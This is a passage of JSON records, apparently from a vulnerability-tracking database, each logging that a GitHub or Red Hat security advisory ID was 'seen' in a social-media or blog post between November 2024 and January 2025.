"f78c4605-70e3-429a-94fb-f461db70fb6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrm-c32x-w4jf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113549062152557037", "content": "", "creation_timestamp": "2024-11-26T11:39:48.181647Z"}, {"uuid": "3c536d86-3a2f-4e85-a69e-9fcbd82acd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-393w-w6jh-pq3j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113600895756889464", "content": "", "creation_timestamp": "2024-12-05T15:21:46.274049Z"}, {"uuid": "938cea65-def2-4feb-bb76-c758d5170900", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhx6-c78j-4q9w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602650357813905", "content": "", "creation_timestamp": "2024-12-05T22:47:59.618310Z"}, {"uuid": "10a70bfd-9f9c-479f-a4ca-0aceb362cb14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2xrw-5f2x-m56j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113522077469095315", "content": "", "creation_timestamp": "2024-11-21T17:17:14.640332Z"}, {"uuid": "11b72c04-a1fb-4118-9d32-f6d5b51e2485", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w5rq-g9r6-vrcg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113546189025985403", "content": "", "creation_timestamp": "2024-11-25T23:29:07.774307Z"}, {"uuid": "bb6de3c0-c297-4ace-8810-4b7bc388b100", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4vvp-jf72-chrj", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113600895742025946", "content": "", "creation_timestamp": "2024-12-05T15:21:46.063497Z"}, {"uuid": "479fc5c9-59ca-4a69-99f3-f9a0dbf58402", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4c49-9fpc-hc3v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602773754165371", "content": "", "creation_timestamp": "2024-12-05T23:19:22.131447Z"}, {"uuid": "27d903c3-0dd2-4f9d-8a23-e58aedca3c63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jc6-h9w7-jm3p", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113589662202793796", "content": "", "creation_timestamp": "2024-12-03T15:44:55.918013Z"}, {"uuid": "51130062-20d6-406b-8ad4-0b2f4b75b360", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jp26-88mw-89qr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113602505841454122", "content": "", "creation_timestamp": "2024-12-05T22:11:14.080865Z"}, {"uuid": "8de5a5c8-a446-4f31-9f40-ae20a852ccfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7pj7-hfwv-q3v6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113600895790799257", "content": "", "creation_timestamp": "2024-12-05T15:21:46.716007Z"}, {"uuid": "d26c632b-cb94-4edd-a463-34296c9b3e96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6vx4-v2jw-qwqh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624371046573962", "content": "", "creation_timestamp": "2024-12-09T18:51:50.633866Z"}, {"uuid": "65942712-9319-4274-9c84-250c75ee32fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xhw3-4j3m-hq53", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624874021159386", "content": "", "creation_timestamp": "2024-12-09T20:59:45.456259Z"}, {"uuid": "7942b7ec-2aba-4e67-8ec2-9631b4b3939f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-849r-qrwj-8rv4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624874055932705", "content": "", "creation_timestamp": "2024-12-09T20:59:46.002213Z"}, {"uuid": "3e4a1b0b-a9fe-43a6-90c9-82e85b33eb85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c2xf-9v2r-r2rx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113624946852005474", "content": "", "creation_timestamp": "2024-12-09T21:18:16.847297Z"}, {"uuid": "5c7557b6-0c79-44e4-b4ba-c2380e0be667", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5462-4vcx-jh7j", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113629284744748531", "content": "", "creation_timestamp": "2024-12-10T15:41:27.953005Z"}, {"uuid": "4232219e-cc21-4ff5-8311-22131eaf29b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vm32-9rqf-rh3r", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113629669818413679", "content": "", "creation_timestamp": "2024-12-10T17:20:06.658515Z"}, {"uuid": "4b5e4306-fcf7-4cc2-b7b2-81c822cb9a6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gv5c-8pxr-p484", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113676532984953254", "content": "", "creation_timestamp": "2024-12-18T23:57:18.881398Z"}, {"uuid": "b1226964-8572-45b6-b029-e95504d85d98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qmcw-h4f9-j3h3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113686907311266678", "content": "", "creation_timestamp": "2024-12-20T19:55:38.434677Z"}, {"uuid": "0635214a-32a3-41e3-b02e-c75cffb29539", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cvv5-9h9w-qp2m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113687004395004128", "content": "", "creation_timestamp": "2024-12-20T20:20:19.718411Z"}, {"uuid": "18b4ddd8-15c8-4973-930f-fe7b466da97e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g65h-982x-4m5m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113687004412562172", "content": "", "creation_timestamp": "2024-12-20T20:20:20.150245Z"}, {"uuid": "d32ba46c-274b-4b8b-bf6d-1efe6bb910d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3pfm-hp96-pfgv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113680964695610869", "content": "", "creation_timestamp": "2024-12-19T18:44:21.233449Z"}, {"uuid": "b3986e03-44c9-4d91-8977-d7a6a90416dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vfm5-rmrh-j26v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113630998131727296", "content": "", "creation_timestamp": "2024-12-10T22:57:11.984848Z"}, {"uuid": "449bb96c-3072-4d8f-840a-b1222c4d3f50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ggqg-3f7v-c8rc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113630998146893259", "content": "", "creation_timestamp": "2024-12-10T22:57:12.298457Z"}, {"uuid": "a959da0e-635f-490b-9762-9aba05fc0207", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hhfg-fwrw-87w7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113631058808905104", "content": "", "creation_timestamp": "2024-12-10T23:12:37.961470Z"}, {"uuid": "923d7d97-d7a2-4ec3-8beb-1e9d44a88bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3r4x-6pmx-phwr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113635001277155546", "content": "", "creation_timestamp": "2024-12-11T15:55:15.452552Z"}, {"uuid": "616a2be4-5d6d-44fc-8133-1c90a98dcec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r3mx-fr5f-gwgp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113635262751522479", "content": "", "creation_timestamp": "2024-12-11T17:01:44.887338Z"}, {"uuid": "f15a035f-5279-471f-ad68-5b9b3ceb6c1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x794-564w-vgxx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113635295248950416", "content": "", "creation_timestamp": "2024-12-11T17:10:00.671818Z"}, {"uuid": "c3c96079-6b41-4eb8-b0fe-498d9fa9d47d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vjmw-j32j-ph4f", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113635295264729068", "content": "", "creation_timestamp": "2024-12-11T17:10:00.993642Z"}, {"uuid": "38f09cb2-596d-4d7a-8031-c915766f8ac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v977-g4r9-6r72", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113635458929398685", "content": "", "creation_timestamp": "2024-12-11T17:51:38.279179Z"}, {"uuid": "6ff5fd04-4734-4449-a833-7fe0ea93f217", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wm57-466g-mhrr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113636589336290307", "content": "", "creation_timestamp": "2024-12-11T22:39:07.249492Z"}, {"uuid": "ed5ccce2-c65d-4c8c-a66b-9ff737c26bce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw5r-6927-hwpc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113636619774435599", "content": "", "creation_timestamp": "2024-12-11T22:46:51.500005Z"}, {"uuid": "ee843c71-3a1d-4913-8a8a-2672a48ccd53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xx68-37v4-4596", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113636619788953280", "content": "", "creation_timestamp": "2024-12-11T22:46:51.765321Z"}, {"uuid": "6a93eda8-403e-47da-95ab-f43f68252a87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-25w9-wqfq-gwqx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113636645888375126", "content": "", "creation_timestamp": "2024-12-11T22:53:29.957639Z"}, {"uuid": "9125f331-5b13-4640-a939-cf12b6263f95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4pjc-pwgq-q9jp", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113637199321243723", "content": "", "creation_timestamp": "2024-12-12T01:14:14.834253Z"}, {"uuid": "37ea7f8e-5941-4d72-916c-90cc07242cdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fqj6-whhx-47p7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113637199306185680", "content": "", "creation_timestamp": "2024-12-12T01:14:14.932455Z"}, {"uuid": "6e7a71ba-755a-45a0-ab37-05d216a7ffcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r4pg-vg54-wxx4", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113639063448885845", "content": "", "creation_timestamp": "2024-12-12T09:08:19.017572Z"}, {"uuid": "3687e7bc-c246-405d-a698-1bbdb882b858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrf3-9q84-rcmf", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675333560634722", "content": "", "creation_timestamp": "2024-12-18T18:52:16.832971Z"}, {"uuid": "d21f46cc-5088-472a-81b4-448a9c8fe749", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cq5q-cqr7-vmf6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113687040938359325", "content": "", "creation_timestamp": "2024-12-20T20:29:37.380588Z"}, {"uuid": "78ca964a-d7dd-4796-a842-94fa631d3a1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qv69-5cj2-53r9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113687040973152332", "content": "", "creation_timestamp": "2024-12-20T20:29:37.876921Z"}, {"uuid": "a1b6ff62-98bb-42c6-aca1-56f5ab0f8431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j2pq-22jj-4pm5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641035648128218", "content": "", "creation_timestamp": "2024-12-12T17:29:52.665086Z"}, {"uuid": "59b97626-8fca-4944-ae94-38486f31d79a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wh34-m772-5398", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641379176104368", "content": "", "creation_timestamp": "2024-12-12T18:57:14.140778Z"}, {"uuid": "7f9361bb-5d09-4389-865f-ca76f90d3ae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7mj5-hjjj-8rgw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641404885985284", "content": "", "creation_timestamp": "2024-12-12T19:03:46.527115Z"}, {"uuid": "39becb24-8c5e-47ba-87d8-20ef07d7d143", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cwq6-mjmx-47p6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641404902137205", "content": "", "creation_timestamp": "2024-12-12T19:03:46.853422Z"}, {"uuid": "15f36fb7-e7a3-4462-9d4a-f78803327b20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2r87-74cx-2p7c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641477877056322", "content": "", "creation_timestamp": "2024-12-12T19:22:20.184455Z"}, {"uuid": "2dc5bb84-5413-41d5-9b2a-f8229812419d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r279-47wg-chpr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641477906690234", "content": "", "creation_timestamp": "2024-12-12T19:22:20.857131Z"}, {"uuid": "46382418-0556-4f88-923c-452ea13852e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x6mh-rjwm-8ph7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641477891690387", "content": "", "creation_timestamp": "2024-12-12T19:22:20.951179Z"}, {"uuid": "94dd3db5-0c99-4e98-997c-f7633a8c7f35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9j3m-fr7q-jxfw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641505474577906", "content": "", "creation_timestamp": "2024-12-12T19:29:21.366526Z"}, {"uuid": "1ecec515-1d5c-45a5-aefe-ea021ab3304a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-725p-63vv-v948", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641505490165741", "content": "", "creation_timestamp": "2024-12-12T19:29:21.672556Z"}, {"uuid": "c8a247b2-0388-447f-8910-c78d8b9afdf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m592-g8qv-hrqx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113641528492308277", "content": "", "creation_timestamp": "2024-12-12T19:35:12.502305Z"}, {"uuid": "74812eda-cb70-46b4-afb9-96d22f597cf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w8qm-xw38-93qw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113675333546421490", "content": "", "creation_timestamp": "2024-12-18T18:52:16.758959Z"}, {"uuid": "f69df37d-a96d-4749-aab1-75a0157c503d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49w6-73cw-chjr", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681037883401643", "content": "", "creation_timestamp": "2024-12-19T19:02:58.075684Z"}, {"uuid": "d955ddf2-931b-4893-a783-4cfb7c1b0210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jvfm-gf4f-33q3", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113687040956069481", "content": "", "creation_timestamp": "2024-12-20T20:29:37.558912Z"}, {"uuid": "8197afb2-2990-433a-8a90-ad45099e8bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3r7-8gw7-qwvc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113645827432960822", "content": "", "creation_timestamp": "2024-12-13T13:48:29.142619Z"}, {"uuid": "366f2006-7375-4668-865d-43217a4a348f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8596-2jgr-ppj7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113708724559281732", "content": "", "creation_timestamp": "2024-12-24T16:24:03.134895Z"}, {"uuid": "08d19b2f-5ea4-4745-88ad-d937cdd8983c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8gc2-vq6m-rwjw", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113708724574832048", "content": "", "creation_timestamp": "2024-12-24T16:24:05.585086Z"}, {"uuid": "fcfd67f5-2376-4216-b821-658c1475585f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g63m-5vjv-wr3v", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113708724590672241", "content": "", "creation_timestamp": "2024-12-24T16:24:05.889300Z"}, {"uuid": "e95821b2-69de-4d84-bdce-30a40bee19f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73x6-fqww-x8rg", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793424505378105", "content": "", "creation_timestamp": "2025-01-08T15:24:22.071844Z"}, {"uuid": "fa9aff0e-efcb-47c1-9545-eb0ed9f61c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p2pg-67m3-4c76", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793458635380791", "content": "", "creation_timestamp": "2025-01-08T15:33:02.965354Z"}, {"uuid": "47bdd0ed-19c6-461f-be34-8151d1673702", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58mg-ww7q-xw3p", "type": "seen", "source": "https://bsky.app/profile/Kubernetes.activitypub.awakari.com.ap.brid.gy/post/3lfayiptjt662", "content": "", "creation_timestamp": "2025-01-08T20:22:12.405675Z"}, {"uuid": "599fccde-e465-4891-92e6-c0756942e26e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5rx-rmq3-ff3h", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793488636536286", "content": "", "creation_timestamp": "2025-01-08T15:40:40.871360Z"}, {"uuid": "a8fe5315-7ce4-4dc6-81a9-b6a4f72b22ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j4jw-m6xr-fv6c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113793510200311392", "content": "", "creation_timestamp": "2025-01-08T15:46:09.329986Z"}, {"uuid": "ca27fa4f-2bc4-4e6c-90b7-4dffc597e25a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8f9-hh83-rcq9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113799538335498729", "content": "", "creation_timestamp": "2025-01-09T17:19:11.444867Z"}, {"uuid": "a3cfb287-0831-46b4-9ea5-84b202ff61f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-237r-r8m4-4q88", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113783059656534803", "content": "", "creation_timestamp": "2025-01-06T19:28:26.804978Z"}, {"uuid": "03d798a2-d110-450c-8c11-fadf5b8fd315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-675f-rq2r-jw82", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113799577018369526", "content": "", "creation_timestamp": "2025-01-09T17:29:01.658932Z"}, {"uuid": "5f22f140-aca9-4f6c-a5c3-e4c3f9e1506a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2775-42rh-535q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823031946636210", "content": "", "creation_timestamp": "2025-01-13T20:53:55.460655Z"}, {"uuid": "dfe7a6ec-13be-47f9-aac8-d8f19f8bebab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j3f9-p6hm-5w6q", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113794680065130976", "content": "", "creation_timestamp": "2025-01-08T20:43:41.792438Z"}, {"uuid": "d5ed7cca-1e51-4b7e-a4ef-c4a73a21a652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfjj-7rgc-6j2m", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823031961707899", "content": "", "creation_timestamp": "2025-01-13T20:53:56.197595Z"}, {"uuid": "651eaae4-ce78-4f56-acd6-1593c713f0d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wr55-2952-79rh", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823054063636127", "content": "", "creation_timestamp": "2025-01-13T20:59:32.987305Z"}, {"uuid": "547eb15a-5bd4-456b-841e-43f3e2abda7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6q73-74pc-p3c8", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823054078980794", "content": "", "creation_timestamp": "2025-01-13T20:59:33.241066Z"}, {"uuid": "1a3438b6-15df-44de-b430-732edfd393a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86c2-4x57-wc8g", "type": "seen", "source": "https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/", "content": "", "creation_timestamp": "2025-01-14T17:04:36.000000Z"}, {"uuid": "d21bf9ac-7feb-4412-845f-897e20c51ec9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xm3h-x3rv-whr5", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823054093673345", "content": "", "creation_timestamp": "2025-01-13T20:59:33.591084Z"}, {"uuid": "068ed007-8577-4d43-a52a-13272205dec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0299", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113825801162950648", "content": "", "creation_timestamp": "2025-01-14T08:38:10.290394Z"}, {"uuid": "1d29a83c-f23c-4ceb-87e4-fcc7cf766747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0300", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113825801162950648", "content": "", "creation_timestamp": "2025-01-14T08:38:10.331585Z"}, {"uuid": "efaddb7d-854c-41b8-b418-0e57b3a06de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8cp5-vr69-h8xx", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113823054108124936", "content": "", "creation_timestamp": 